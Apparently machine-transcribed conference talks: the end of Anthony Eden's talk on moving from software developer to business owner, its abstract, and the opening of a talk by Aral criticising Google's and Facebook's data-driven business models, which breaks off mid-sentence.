tiny. But for me, I was like, man, look at the, this is amazing. And I hated everything about it. Like, I hated what I was doing. I hated this idea of taking more money from the public and then trying to create something and just trying to make sure that I kept getting the next contract for the company I was working for. So I did learn an important part, though, during that. And I learned how to sell, how to propose ideas, how to stick with a potential customer until we got them to buy. All right? So another good lesson that comes out of, came out of it. Went back and tried to do.mp again. Take two. We actually got money this time. We had some angel investors who gave us, like, a million and a half dollars. We went back and said, oh, man, this is going to be awesome. We have so much money. We're going to hire a team. It's going to be the best thing ever. And we started building and we focused on building this product that did everything for no one. And that was another great lesson to learn. All right? I learned at that point that we should have built something simple just to test. Put it out with some of our potential customers. Said, what do you think of this thing? Do you like it? Is it useful? Does it solve your problems? Again, this was in the consumer space, so it was even more important because there was going to be a race, at least so we thought. Turns out that we were actually in a space that had that nobody ever did very well in. A couple companies got bought out. And the other thing that I learned during this process was that you have to start charging money early on in the process. Otherwise, your company dies. Companies live and breathe on cash flow. That's what makes a company go. You put money in. You get cool stuff out. You don't have money coming in. No cool stuff comes out. Everybody goes broke. That point, I said, okay, I've done the government thing. I've done the startup thing. I'm just going to freelance for a while. You know, be a gun for hire. Now, at this point, I had been programming the entire time. I had been, I had used Perl. I had used Java. I had developed systems in Ruby at that point. I had written things in Python. So I had got, I had enjoyed being a programmer. I love building stuff. I love being a programmer. But I also love being able to support my family and have money coming in. So I said, okay, I'm going to do this for a while and see what freelance contracting looks like. When you start freelancing, there's a couple things you learn early on. One, you have to get good at managing your own time. Because it's very easy to say, oh, I'm, you know, I'm billing by the hour. So I'll make up my hours near the end of the week. Instead, I'm going to go watch some TV or a movie or play some video games or maybe go out or whatever it is. And in reality, when you're charging by the hour, if you don't work those hours, you don't get paid. And so it was important to learn to manage my own time. And that's a really good thing to know how to do as well. So during that freelancing part, I learned to manage myself and also learn to go out and find new customers. Sometimes they would drop in my lap. Oftentimes I would have to use my network. But the point was, is that I started to learn to build out this network of customers that I could come back to. So that lasted for a little while. Then I went to work for this tiny little company, Living Social, which at the time was sucking up all these developers in Rubyland. And I did that because I was kind of tired of the rat race of trying to find more money and more contracts and things like that as a freelancer. I was tired of working by myself. I was tired of getting crappy projects and having to pick up like after other people's mistakes. I said, okay, I'm just going to go do this for a while. So Living Social was at the time like a startup but not. It was a absurdly funded startup. So it had all the problems of a startup as well as all the problems of a big company. Thousands of employees, lots of investment money, but not necessarily doing very well in terms of profit, say. And maybe a less than successful business model. But it did give me the chance to work with a larger team and to see some people that I really respect and learn from them how they build teams, how you deal with quickly growing teams, these rapid teams, things like that. So that takes us up till today. At this point, I had been doing some closure there, some more Ruby, things like that. It was great. And in 2010, I had was actually, before I left, before I joined Living Social, I said, I'm going to start my own thing. And my approach was going to be I'm going to take the safe route. I'm going to have my thing on the side and then I'm going to do the other work. So I was going to balance the two of them. And it's actually a really good approach for building a company because you have the safety of your day job or your contracting and then you have the pleasure and the time to build this thing on the side. Now, I'd also already learned to try not to build something that had everything for everyone. So that was a lesson I already learned. Had I not learned that and I've seen people do this before, I could have very easily just spent all my time building something instead of launching. But I'd already learned that lesson so I launched the product in July of 2010 and just started building up a customer base. And one of the best ways to start building up a customer base when you have a small company like this is to talk to your tribe. The idea is that you probably have people around you that have similar needs to you, all right, or have needs that you're aware of, acute needs, problems that need to be solved today. And so I spoke to that to my tribe and I, through Twitter and things like that, I said, hey, what do you think about what this is doing, what we're doing here? Is it interesting? Is it something, would you like to pay money for it? I already started charging money from day one. And it slowly, slowly, slowly started building up a little bit of money coming in and all the while working so everything was good. So as I started doing this, I said, this is what I think that I'm going to do. I'm pretty certain I'm going to spend all my time writing software, right? That was what I figured would happen. As you can imagine, what I actually do and what I have actually done for a long time is much different than that. I have to generally manage the financing and accounting. Granted, I have, you know, people that help do taxes at the end of the year. I have contractors. But as the owner of the business, well, as anybody in the business, if you don't know how the money flows, you don't know how your business is, is whether it's doing well or it's not doing well. So you have to understand both, do I need to get money from somewhere alone or some sort of cash coming in or a line of credit or whatever it might be? And then once I have that, I need to track all the money coming in and out to figure out, am I going to be able to keep my head above water and pay back the loan or whatever it may take? So financing accounting, second thing was sales. I had to get out there and keep finding new customers, keep finding people. Now, eventually, you create a flywheel in any successful business where your customers refer other customers, you have things that bring in additional customers, but you still have to understand how to sell. Selling is a huge, huge skill that's important. You have to understand marketing. You have to understand product management. You have to understand customer service. You have to do strategy. So you have to figure out where you're going in the long run, not just this month, not just this year, but what's the big goal of the company? Where do we want to, where do we sell sales in three years, five years, things like this? And I use us and it really was only two of us for a long time. But that's how I had to think. I had to think, I had to imagine I'm building a company here that I want to last. And notice I've never said I'm building a start-up because that's not what this was. This was a company that was going to last. That was my goal. I want to build a company that survives, that is a good company that I can have people come work for. I also had to do what is, I was looking for a better term for this, how to build teams and how to help make sure that your employees and your teammates are happy and motivated, how to run the systems. And then finally at the bottom I was writing software. So all of these things are pieces of what you have to do and they're the skills that you need in order to actually build a successful business. All right? Like I said, finance and accounting, you have to understand where the money flows, sales, you have to be willing to sell, marketing, you have to understand how to deliver the message of what your product fixes because a good product fixes a problem that people have. All right? A really good product is like an aspirin to a product. You want to actually fix a pain that somebody is having right now. You find those pains and people will give you money to fix them for them in an efficient fashion. And you have to be willing, you have to know how to message people to tell them, that's what we do. All right? In addition, you have to learn how to take your product and make it better. One of the goals that we've always had at D&Simple that I've always had is how can I do the simplest thing possible in a world that's driven by complexity, which in the case of domain registrations tends to be there's all these rules of things that you have to do in ways that it's always been done. And so the goal was how can I keep that as simple as possible? And that's all about developing a product and understanding the product lifecycle and understanding how to make the product just good enough so that we could launch it, but at the same time, knowing that we weren't going to overdo it and spend all of our time just trying to add these features, these useless features. And I'm not to say that we didn't add some useless features along the way, but we've also removed features along the way. So you have to understand how to develop the product. You have to understand how to help people. You have to know how to diffuse the bombs of customer service because there's nothing quite as scathing as somebody who is not happy with your product and they have a Twitter account. All right? These two things combine together. It's just, it's got a really short fuse on it. So you have to understand how to empathize with your customers, how to realize, put yourself in their shoes and imagine if they just click through seven pages and they still haven't accomplished what they've done. Like the easiest way up course is to dog food your own product to use it and we are able to do that. You can't always do that, but usually that's the best way to do it. Strategy, having a vision and something that not only you can believe in because you have to motivate yourself day after day when things aren't great in the very beginning and you have one person buying something and then a couple of days where nobody buys something and another person. You have to have a vision and a dream, something that you can look forward to and say, this is what I'm aiming for and this is why I'm going to suffer through these hard times and there's going to be more hard times along the way. So you have to create that and then that same vision has to eventually be given out to your employees and the people that work with you, your partner is your employees, whatever how it is, they have to share that vision and it won't always work. Sometimes you'll think you've gotten the vision across only to realize that someone else on your team has a completely different idea about what the business is all about. So that's another thing you have to do. You have to entice people to come work with you, how to share that vision and then how to keep them happy. That's an important part and a very, very hard part of what you have to do. In fact, maybe the hardest part of building a company is the day when you hire your first employee and you realize that they don't have any financial vested interest in your company's success. So what is it that motivates them to be there every day? And so you'll start thinking about these types of things and it's an important part of what you have to go through. You have to learn to adapt with your team. As your team grows, there's going to have new opinions and that's good. You want those opinions in there but you have to be willing to adapt. So a successful leader in a business is one who's going to adapt to the team around them and build up a great team over time. It also means that you have to be willing to fire people sometimes. This is really hard. If you've never managed a team, the first time that you have to tell somebody that they're fired is probably going to be one of the hardest days you're going to have in a year, all right? Because sometimes you have to fire somebody because they're underperforming. But they're going to take it bad pretty much no matter what, because they may be thinking that they're performing very well, even if you've warned them multiple times. And that's a very, very hard thing to deal with. You may just have people that also just leave and that can also, especially if it's in early days of building a company and somebody just decides they don't want to be part of your company anymore, you have to shoulder that burden and you have to talk to your team about it as well. So these are all aspects of working with people. You have to be willing to understand how your systems work and this is the systems of software, of hardware, of whatever it is that you are actually running out there and building. I'm focused largely on companies that make software or services because that's what's interesting to me. But even if you, or maybe even more so, if you're building a physical product, you have to deal with all of the operations of getting that physical product from design to delivery, right? And these are all things that you have to, the operations of the company and of the systems are really, really hard as well. So these are all skills that you'll need. And of course, you can finally touch in on your software development skills since I know that everybody, well, most people here at the conference are probably pretty good developers. So, but it's, I'll tell you this is actually a really good thing. This is something I want to get back to you here now. So I minimize the need for focusing on software development. The reason is because you're good at it already, all right? What you have to get is get good at all those other things. But software, the skills that you've learned as a software developer or as an engineer or as a product manager, that's your secret weapon. There are multiple secret weapons, I think. So I'm going to go through them really quick. And these are the strengths that I think that anybody who develops software over a significant period of time will learn from their, as they learn their craft, all right? The first one is you have an ability to construct systems, all right? So this is, you can look at a problem and not just look at one piece of the solution. You can look at the system as a whole with data coming in and data flowing out and multiple components along the way and maybe variations in paths where you have branching. And many people don't think in this way until they're, until they are trained to do it or if they're really passionate about it and learn. But every time that you're inside of a piece of software and you write a little if-else branch, you're, you're, this is the change in the system. This is complexity in the system. And software developers who over time learn to control this complexity in the system have a sense for building these systems. And in fact, all the businesses are systems that work well together to ensure that money comes in and not more money goes in. More money coming in than going out to pay for stuff. That's essentially what it is. So being able to put together systems like this is one of your superpowers, if you will. All right? The second one, your creators. You have a skill. You have an ability to control the machines to tell them what to do. And with this, you have the power to automate things very early on. All right? A lot of, if you were not a software developer, a lot of entrepreneurs would do a lot by hand for a long time or they'd hire people to do it and they'd start bringing on people, whether it's contractors and you're going to have to do this as well. Or they might hire virtual assistants or they might hire actual employees that are low level and have them doing tasks that are manual. But you have a power, they do a superpower where you can have the machines do that work for you. And that's something that's a very, very, very important part of being able to build a successful business in a bootstrap fashion. The third thing that you have, most of you probably have, is you have an ability to, you have an analytic mind. So you have the ability to look at a problem and analyze it and think about the various outcomes and what you want. You have a goal. You say, okay, I'm going to look and I know the path to get from here to there, so from A to B. All right? So you have this mind. That's powerful as well, because it ties back into the ability to build those systems. So not only do you know how to create those systems and operate those systems, but you have the ability to actually think through them in advance. And then finally, you may not think that you have this, but more and more developers are being called on to be responsible for the systems they put into production. You've probably heard the whole DevOps movement. There's at least, there's several talks here that about it. What that really is about is every software developer taking responsibility for every bit of code that they put into production. From the day it goes into the day it dies and is turned off. All right? That's a big responsibility. That means being responsible and not writing buggy code. It means being there when you have outside factors that come crashing in and fight to take down your systems. Right? So this responsibility is something that is, it's extremely valuable in the terms of building a business because when you're at the helm of a business, you're responsible for all those things I talked about earlier. All right? And as long as you're willing to take that responsibility, you have a power to actually build that into a successful business. The worst thing you can do is say, eh, that's not my problem. Well, if it's your business, it damn sure is your problem because it'll stop the money coming in and it'll have more money going out. So those are the four things that I think, and they're probably more, but these are ones that I feel are important, that software developers have this ability, these special abilities, these powers that not everybody has. All right? So use those special abilities, take them implied in your business. There is a problem, there are a few issues that you have as well. I'm going to go over two of them right now and I suffer from this as well and it's something I focus hard on trying to be better at. The first one is because we spend our time with the machines, many of us have a limited amount of empathy for the people around us. All right? We forget how to take into the factor what you're thinking and what you're thinking and when you're using the product, how am I feeling when I'm using the product? How does the product make me feel? Does it make me happy? That's awesome. That means you have more customers. Does it make me angry? That means you're probably going to have customers that are going to be there for a little while and then they're going to go away and they're going to talk bad about you. Does it just make you sad? All right? Then they just might give up all together and go, okay, I'm going to be a beat farmer somewhere in the Midwest. So we have a problem with empathy and that's one of the things that I think that is starting to come around that maybe software developers are, we are as a group, are starting to understand that we need to be better at. I definitely know I am. I'm working on this every day to try to identify and understand the feelings of others around me because I can be a very, very harsh person. So the other one that I think that we sometimes have trouble with is the ability to just let go and delegate a task or a subsystem to somebody else. We want to be in control. That desire to be in control is a very powerful desire. You want to tap into that in the beginning when you're creating the company because it's going to be the driving factor. When you're having it in one of those times, you're like, why the hell am I doing this? I could just go work for somebody else. When you come back to it, you're going to remember, oh yes, it's because I want to own this thing. I want to be the responsible person for this. You just have to know there comes a point where you can't do all of it. You're going to have to hand off. It doesn't have to be a fast thing. You can grow organically and delegate over time, but you do have to be willing to let go. Before you let go, you have to put things in place to guarantee the success of the people that you're letting go to because they're your team. They're going to be the ones that you depend on to do a great job. This comes back to setting up systems, to preparing for the inevitable time when you have to hand something off, be it software development, be it marketing, be it sales, whatever it is. I have a problem with that. I'm just going to... A lot of people that I know the right software have a problem with that. We like the control factor, and there's a point where we have to give it up. So, it's key to success in all of this. The first is, and I talked about this in the beginning with lots of those slides, that I failed a lot, and I'm okay with that. Failure is the time where we learn how to do better. And if you're not failing, it's because you're not trying hard enough is what it comes out. You're not pushing yourself beyond your limits. If you're always a success in your mind, then what are you not doing to actually push yourself beyond those limits? Right? So, I've come to embrace failure. I'd prefer that once I've failed once, I don't repeat that. And I think that's the mark of someone who's successful is they fail once, maybe twice, but they learn from it and they don't make that mistake again. The second thing is you have to know when to move on. One of the hardest things to do is when you have those golden handcuffs of that great job or that consultancy that you're building stuff for other people and it keeps the money rolling in, and it's like, but you're not thrilled about doing it, but, wow, look at the cash rolling in. And that's one of those things where you have to know, all right, if I really want to do this thing, I have to know when it's time to move on. And I'm not suggesting you just jump ship with no plan on the contrary. Do it methodically. Do it just like you were building software. You know, test your theories, say, this is my goal, and then start building out these systems that let you reach that goal. You have to take calculated risks, not just risks, not just any old type of risk. You have to calculate the possibilities that are around these risks. And you have to ask yourself, is it worth this risk? Is the potential outcome, the problems that could occur from it, the damage that it can cause, is it less than the benefits that I can gain from taking this risk? So any entrepreneur has to be willing to take those risks. And there's cultures, I live in France now, and in France for a long time, risk was, especially starting your own business, was looked down upon. It's a culture that does not believe that you can fail, and so therefore people take less risks. Fortunately, in the United States, the opposite is true. People take stupid risks all the time. I mean, just throwing money away, throwing, just doing crazy stuff. So there's a balance in between there. And the balance is about knowing those risks you're going to take, calculating what the potential outcomes are, and then going for it when you say, this is a, this generally will probably be a good thing. Trust but verify. If you've heard this, this is important as you start to hand off to your team. You have to be able to trust your team, but they, somebody's going to screw you. That's what it comes down to. Somebody is going to eventually do something, whether it's on purpose or not, that will cause you a lot of trouble. So you need to learn to verify as well. Trust that they're going to do a good job, but verify that they did a good job through the process, through whatever processes you build. And then finally, understand what people need. This comes back to the empathy. When I say people, I mean your customers. Get out there. And if you think that you're going to solve a problem, get out there and talk to them and say, am I solving your problem? And if not, listen to what they're telling you. Why are you not solving their problem? But it's not just your customers. You also need to listen to your team. All right. Make sure that they're happy. Your business partners, your partners in life, your husbands, your wives, your girlfriends, your boyfriends, your significant others. It doesn't matter. You need to listen because this is a stressful thing. Building a company is very hard and you need to listen to what the people around you need as well. Because if you can deliver what they need, then you'll be very happy. And that's the final person that counts in here. You have to listen to yourself. You have to say to yourself, what am I really looking for when I'm doing this? Right? What are my needs in all of this? Because it's also very easy to get so deep into solving everybody else's problems that you let yourself go. All right. Did you start? You stop exercising. You eat unhealthy. You know, these are all the symptoms, essentially, of focusing so much on everything else that's going around that you forget about your own needs as well. So to finish up here, I have a couple more things and then I'll let you guys go queue up and we can go talk about this outside. Why build a business in the first place? If you have a great job that you really love, why? Why even take the time and the risk to go out there and build a business? And the answer is very simple. That if you want the freedom to do what you want to do, which may be charitable projects, it may be spend more time with your family, it may be go travel around the world, whatever it may be, that only you, you're the only person that can control your life and get those things that you want. All right. And by having, and I'm not knocking, I was employed for a long time and I worked for many, many great companies, but there comes a time when you have to look and say, I'm investing my time and they're getting the benefits out of it. Yes, I'm getting a paycheck, but in the long run, what do I really get? And building a business of any type is about building something that is going to return over the long run. There will become a point in time where you can hand off as much of this as possible and you realize you've created a business that sustains you without having to spend all your time doing it. And that's the goal. That's the goal of building these systems. It's the goal of finding great teams. It's the goal of making sure there's more cash coming in than going out. All of this is designed to let you control your life. If you don't ever want to run a business, fine. It's not for everybody. But all those skills that I talked about, finance and accounting, marketing and sales, product management, don't just turn your back on them. Because if you can own those things as well in the terms of whether it's inside your business or your personal life or whatever it is, you are extremely valuable because most people will not look at that. They're not going to look at the big picture. They're not going to think, how does my company that I've been working for actually operate? Where are their customers and why do they come and give us money and why do they leave? And the minute that you know that is the minute that you actually have power over your destiny even inside of a company. So don't just turn your back on these things and just spend all day programming. Programming is a lot of fun. Building systems is a lot of fun. But you know what? Having the knowledge to actually build systems that go beyond computers and involve people as well, that's really powerful. Ultimately though, you have to craft your life. All the pictures that I've been showing along the way are pictures from places where I've had the fortunate ability to live there. I've had the pleasure of living out in Hawaii. I've lived in Florida. I've lived in Paris. Now I live in the south of France and that was only possible because I was willing to take a chance and look at the paths that were out there, take calculated risks and essentially craft a life that I want it. All right? So I hope that this gives you a taste. If you're sitting there on the fence and wondering, should I be, should I take the jump and actually start building my own business? If I do it, you know, is this going to suck? Is it going to be great? I hope this gives you the incentive to give it a shot if you're on the fence. And if you're not on the fence, just think of the things I've talked about. What can you do? What's the one thing that you can take from that list, that one skill that you don't know right now that you're not very comfortable with? Sales maybe? And get better at it. Just go try to sell something. Just go try to pitch and write some copy and get somebody to actually go, man, that's pretty good. Like, just do that one thing and all of a sudden you'll realize, man, that opens up a whole bunch of doors and lets me craft the life that I want to craft. And with that, I am done. These are the pictures that I took, all of Flickr. My name is Anthony Eden. And if you have any questions, we can take it out there or right here, whatever. Thanks very much.
|
You're a software developer today, but tomorrow there's a good chance you'll be running a business, even if you don't know it yet. As a software developer you have a set of skills which prepare you for building businesses. Creativity, problem solving, analytic skills - all of these things can help you step into the role of entrepreneur. In this talk I'll tell you my story of how I went from writing code to running a business and give you some ideas for what you'll need to learn along the way. From a basic understanding of financing and accounting to a sense of empathy necessary to connect to those around you and lead a business to success, there are skills that you can improve on that will help you even if you don't become the boss.
|
10.5446/50787 (DOI)
|
Hi. Hello. People are still taking their seats. Hello. I just want to thank the folks at NDC for that lovely introduction. That's not something I get every day. Yeah. So, thank you also to the 40 or so of you who have unplugged yourselves from the matrix in the video room to come here in person and see the talk. I appreciate your effort. All right. So, let's get this started. How many of you know what this is? Anyone? Someone does. You might have seen my talk before. Yes, he's smiling. This graph specifically, where is it? It's up there. This graph specifically, this point on the graph, is where Facebook knows that you have started your next relationship. Whether or not you have actually explicitly told Facebook that you started your next relationship. So, how do they know? They know because of these little black dots. Now, these little black dots are the number of timeline posts between you and another Facebook user. And the x-axis, the horizontal axis is days. So, that's the number of days leading up to, that's 100 days, leading up to when you started being in a new relationship. So, this is fascinating for me. The question that pops into my mind is when in those 100 days does Facebook know that you're about to start a new relationship? Is it quite possibly before you yourself know? And perhaps more importantly, who owns this information? Because this is very valuable information, right? Who owns this data, this intelligence about us? So, this was released in a blog post by Facebook and someone asked, is this anonymized data available? And Facebook's response was, sorry, we don't even release anonymized data. So, who owns this data? It's very clear, right? In this case, Facebook owns the data. So, if you've been following Facebook recently, they just bought WhatsApp, the messaging application. Well, I say just, it's been a couple of months. For $19 billion. Now, why did Facebook pay $19 billion for WhatsApp? What was worth $19 billion? Well, what they bought were the phone numbers of 450 million people, now over 500 million. But more importantly than that, they bought the right to listen in on all of their future conversations. So, that's what's worth $19 billion to Facebook. So, imagine how much your data is worth. So, you might say, Aral, so what? It's fine. I mean, if Facebook's terrible like that, I'll just stop using it. And, you know, if anyone else is terrible, I'll just stop using it. I don't think that this is a valid answer. I beg to differ. I don't think we can just stop using these services anymore. And here's why. Our relationship to computers has altered fundamentally in the last 30 to 40 years. Computers used to be these external cold devices that took up entire rooms and you had to drive to one if you wanted to use it. Today, we wear them on our persons. You don't get more personal than that. You wake up with your mobile phone. You go to bed with your mobile phone. That's a very personal relationship. There was a time when computers were disconnected from the world around them and from each other. Today, via a plethora of sensors, they are always connected. They're always seeing. They're always hearing. So, today, it's not much of a stretch to say that we have become cyborgs. Not that we implant ourselves with technology. We don't have to implant it. But we extend our biological capabilities using technology. We extend what we can do using technology. We experience the world and we manipulate the world around ourselves using these tools and technologies. And if they work well, they empower us. They give us superpowers. They let us do things we cannot otherwise do. If they work badly, they infeble us. They disable us. They stop us from doing things that we can otherwise do. But what's essential here to understand is that these technologies are no longer optional. These technologies have become an essential part of our lives, of living in the modern world. So, I will disconnect is not a viable solution. We cannot disconnect. So, the question really becomes then, who owns these essential tools? And today, it is a handful of companies. Apple, Facebook, Google, Twitter. What's common among these companies? That they are all closed. And for a subset of these companies, specifically Google, Facebook, Twitter, they are also free services. So, some of you might be saying, so what? That's great, right? Free is great. Who doesn't like free? Free is awesome, right? Who likes free here? Free is good. You like getting free stuff, right? Nobody is putting their hands up. They are like, they know something is coming. Well, for those of you that do like free, right? I want to tell you about a beautiful startup. I am so excited about this startup. I think you are going to be as well. Startups are cool, right? They make lots of money. We love them. We love money, right? Money is great. That's a Silicon Valley way, right? It's called snail mail, all right? And with snail mail, we have solved a very important problem. We have solved the problem of real mail. Yes, yes. We have solved the problem of real mail. With snail mail, you will get free real mail forever. You can send as many letters as you want, as many packages as you want, to as many people as you want anywhere in the world for free, forever. Who thinks this is a great idea? Who would use snail mail? Yeah, yeah, yeah, there are several of you. Now, there is a catch. We do open your envelopes and we do read your letters. But it's only so that we can understand you better, so that we can attempt to give you valuable services and offers from what we've understood, which might be correct. It might not be correct. We're trying, right? And then we'll just put all of that back in the envelope and you will never even know that we were there. Who's still excited? Who would still use it? There's always one. Yeah. In Oslo, there's two apparently. The rest of you, you use Gmail, right? Yeah, nobody uses Gmail here. Who uses Gmail? Right. So there might not be a person opening every one of your emails and reading them, but there is an algorithm. There is a computer doing that. So that's snail mail. Please tell your friends it's at snailmail.com. They can find out more about it. I'm very excited. I think snail mail is going to be huge. So why does Google do this? Why does Google do this? Are they evil? Are they henchmen in a basement somewhere laughing like maniacs? Yes, says someone. I don't think so. And there are lots of good people who work at Google, perhaps misguided. They do it because it's their business model. That's how they make money. You don't need vast conspiracy theories when you have the simplicity of business models. It's simply how they make money. So just like the mutant plant from outer space in the musical Little Shop of Horrors, Audrey II, who starts off as a little sapling that needs drops of blood to grow and then ends up eating whole human beings, Google needs your data to grow. It's just how they exist. And how do they get your data? So they get your data via a plethora of methods. One of them is services. Google started out as a sapling. It started out as search. When they first started out, they weren't even tracking you. They stumbled onto that business model later. But today, Google is not that sapling anymore. It has grown into the big mother plant. It has a plethora of services. So do you want to put all of your files somewhere? Well, please, just put them on Google Drive. Will we look through all of your files to understand you better? Of course we will. That's how we make money by understanding you better. Your photos, please, put them up on Picasso. Will we run facial recognition to see who you are, who your friends are to understand you better? Yes, that's how we make our money. Do you want to talk to your friends? Use Google Chat. Use Google Hangouts. Again, we'll be listening. But just so we can get to know you better, that's how we stay in business, right? And there's also games as well. But before I even go to that, think about it. You know, I mentioned talking to your friends, right? I said Google Chat, right? Hangouts. And we mentioned Gmail, right? Think about Gmail. You might say, Aral, hey, you know, it's fine, but it's my decision. I know what Google are doing. And I'm fine with it, man, because I get this really valuable service back, right? Anyone ever thought this? Yeah, I have nothing to hide, right? I get this valuable service back. But is it really just a selfish decision that you're making? What about everyone who emails you? Google also gets to read their email. And they may not have made that decision, especially if you're using a custom domain. They may not even know that you're using Google, and Google still gets to read their email also. So this isn't just a selfish decision you're making for yourself. You're also deciding for everyone who communicates with you that it's okay that Google can see what they're saying as well. And so I think we have to ask ourselves whether we have the right to make that decision for other people also. So I was saying, and there are games, right? Who's user? Recapture. Recapture anyone? Some of you. It's a great game. They're very transparent about this one, right? It might look like what you're seeing on the screen right now, where you have two words. One word is a word that they know. And they're trying to test whether you're a human. The other word is a word that they've scanned in from a book that they can't read. So they're getting you to help them to read the books that they've scanned in. And sometimes you will see this with the picture of a number on top of a door. That's Google Street View. They've taken a photograph of a door. They can't read the number of it. So they're trying to get you to show them what the number of that door is. And sometimes there are real games. Ingress. Anyone played Ingress here? It's a game that you play on your Android phones. It's free, right? And in Ingress, you walk around the real world and you're playing in teams and you try to find landmarks. And you try to hack into these landmarks in the game world, right? Because there's like an alien invasion. It's really cool. But what they're really doing is they're getting you to walk around town and to provide them with very hard to come by data on pedestrian walking patterns. That's hard to come by data. So what they're doing is they're sending you into the city so that you can get that data for them. And they're just watching you with the app, right? So they give you a game and you play the game and everybody's happy, right? So you might say, Arar, I don't like this. You know? Okay. You've convinced me. I'm going to stop using their services. Damn it. They've lost, right? Google can't lose. They need your data. So if services are easy enough to ignore, let's say, right, what's the next step? Well, what if we give you devices? What if we give you beautiful devices? Anyone have a Nexus phone here, like one of the later ones? Gorgeous experience, right? Google has started to understand user experience now. They didn't always. They do now, right? It's a beautiful experience, a Nexus phone. And guess what, guys? You know, I might as well be working for Google right now because it's also half the price of an iPhone. Wow. Why is a Nexus phone half the price of an iPhone? How can that be? Does Google have twice the economies of scale of Apple? I mean, Tim Cook is meant to be a supply chain guy. Is he asleep at the wheel? Are they incompetent? No. It's half the price of an iPhone because it is subsidized. Because what this is is a glorious, beautiful, gorgeous data entry device that you buy to be able to give your data to Google. So they subsidize that because it is valuable for them, right? And what they do with this is they make your sign in to your device, your login to your device, your Google username and password. Because with a service, you can say I'm not just going to use it. But with a device, if they make your sign in to the device, your username and password, your Google account, then it doesn't matter what service you use, they will still get some data at least, right? That's what they need. That's what keeps them alive a little bit better than nothing, right? Same with their tablets. Same with their Chromebooks, which they're now trying to push into schools, right? Google Chromebooks in schools. What could go wrong? Just recently, they actually had to say, okay, we're not going to read the email of students. You know, they actually had to say that, right? Because they were previously. So you might say, okay, wow, okay, this is screwed up. I'm going to stop using Google devices. They've lost. They can't lose. What's the next step? What's the next step? If you grow with data, what's your end game? If you need data to grow, what's your end game? Your end game is providing connectivity. Why? Because if you can make people sign in, their logins to the internet, their Google username and password, like they're trying to do with Google Fiber, for example, in the US, right? Sign in to the internet with your one Google account, then it doesn't matter what device you use. They will still get some valuable data, right? It doesn't matter if you use an iPhone, you're connecting to the internet with your Google account. They'll still get some valuable data from you. And the same with projects for the next five billion. Have you guys heard of the next five billion? Everyone's talking about them. In case you don't know, they're these poor souls in places where they can't reach the internet. And their biggest, biggest problem, I'm sure, is that they can't reach the internet. And we need to somehow reach these five billion people because, gosh darn it, we are such lovely white people who live in the west who want to give them internet access, right? Like the colonialists bringing fire to the natives. We need to educate them and connect them to the internet, right? That's why Google has Google Loon. Yes, balloons. Actually, just now they announced that they're going to spend over one billion in purchasing satellites so that they can beam internet into these countries, right? What kind of internet? An internet that you sign into with your Google username and password. So it's not inconceivable that in the near future there might be a whole nation whose only notion of the internet is something that you sign into with a Google username and password. And if that's not worrisome, I don't know what is. And it's not just Google. Facebook, internet.org, have you heard about it? They want to connect everyone to the internet with your Facebook username and password. Why? Because they want your data. It's very, very simple. So they need data about you. That's part of it. They also need data about the world. They just really need data, right? So how do they get data about the world? Let's just concentrate on Google because, of course, we could do the same thing for some other companies. But Google is quite unique. So they have Google Earth satellite images. They have Google Maps. They have Google Street View, right? Isn't it great? Have you guys seen the Street View car? It drives around and it, like, gets close-ups of the streets and the buildings. It's really cool. But there are some places that the Street View car can't go. But we need that data. So there is the Street View trike. If the car can't go there, we will go there with a trike, right? But there are some places you can't go with a trike. What if you're on a snowy mountain? Well, don't worry. Because there is the Street View snowmobile. And there are some places that a snowmobile can't go. What about indoors? Right? There is the Street View trolley. They will go around with their trolley. Why? They need that data. They really need that data, right? But what if they can't get there with a trolley? Don't worry. There is the Street View trekker, the backpack, right? Now, even though they have all this, there are still a few places that they cannot go because you probably will not let them in, right? Even if they come with their backpack with this strange thing protruding from it, or maybe because of that fact, you probably will not let them into your office, your workspace, and you probably will not let them into your home. And that is why they need you, right? Have you heard of Project Tango? Project Tango is their latest project. It's really exciting. It's this new mobile phone. And what this mobile phone has is it has built-in depth sensing and has a built-in motion tracker so that when you buy this phone and you walk around your home, it starts mapping out the inside of your home in three dimensions. It starts understanding what objects are in your home and recognizing the objects that are in your home. So isn't this really cool? I mean, you can create a whole 3D representation of your home that, of course, Google has then, right? Because you probably wouldn't have let the Street View people in if they knocked on your door and said, Google Street View, can we come in? I say probably because I've seen a parody on the Internet where a group went to people actually with a hidden camera and said, Google Street View, can we come and map your house? And they let them in. But again, if you don't let them in, well, they can use you. They can send you, after you've bought their phone, into the spaces that they cannot get into to get the data that's there, right? This is all you need to know to understand things like Internet of Things, right? Internet of Things is really important. What is the Internet of Things today? The Internet of Things is the Internet of Things that spy on you. They happen to be things that are on your person or in your home. They feed out to these data sources. They might be independent ones that get bought by Google or Facebook or whatever afterwards once they have enough data, or they might be ones that lead directly to the Mike Nest. So just like Audrey 2 in the musical Little Shop of Horrors needs blood to grow, free services need your data to grow. It is just their business model to monetize your data. Their business model, in other words, is to spy on you, to make money by spying on you. That's how they stay in business, right? So the business model of free is the business model of corporate surveillance. We all know about government surveillance, right? We all know government surveillance is bad. Who keeps telling us that government surveillance is bad? Facebook and Google tell us, right? They're like, look, the government! Oh my God, what are they doing? They're terrible! The NSA! No, we hate them! They should not have your data. In the art of magic, we call that misdirection. Don't look at me. Look at that, right? What is our business model? Oh, we need your data. Yeah, we spy on you too. Uh-huh. So in this model, in this business model, who are you? You might have heard the saying, if you're not paying for it, you are not the customer, you are the product being sold, right? I prefer you are the quarry being mined. You are the livestock being farmed, all of us, right? Because your data is just raw materials, just like what you mine out of a quarry. That's not the most valuable thing. What you extract from that is the most valuable thing. Our data is just raw materials. What's really valuable is our profiles. When we combine those pieces of data together, that creates a profile of you. That creates a virtual you, a digital you. I like to call it a simulation of you. So is Google in the search business? No. They are in the business of simulating you and simulating the world. They're in the simulation business. Why? Why is this valuable? Because I can't take you right now, your body, right? I can't take you, put you in a room, lock you up, and then psychoanalyze you 24 hours a day. I can't poke you and prod you. I can't do that to find out what your desires are, what your fears are, you know, how you tick to figure you out. Because there are laws against that. Our corporeal selves are protected by laws, right? We've had that for a while. But what if I can create a simulation of you? And what if that simulation is high enough resolution? Because I have so many data points about you. That it is essentially you, right? If I can simulate you to that degree so that it is essentially you without your body but everything else that makes you you, I can take that and I can put that in a lab and I can do whatever I want to it. Why? Because there are no laws governing that whatsoever right now. This is one of the things that we need to change. This is one of the areas where we need regulation. So please do not disconnect from the political process because those people that we think are ineffective, we're going to have to support the ones that are trying to change the laws in this way. This might be the pirate party, it might be other parties that actually have an idea about what's going on, which isn't many. But we need to be politically involved as well. This is not something we're going to solve with just technology alone, right? So why are they doing this? Because all of us, we're trying to create 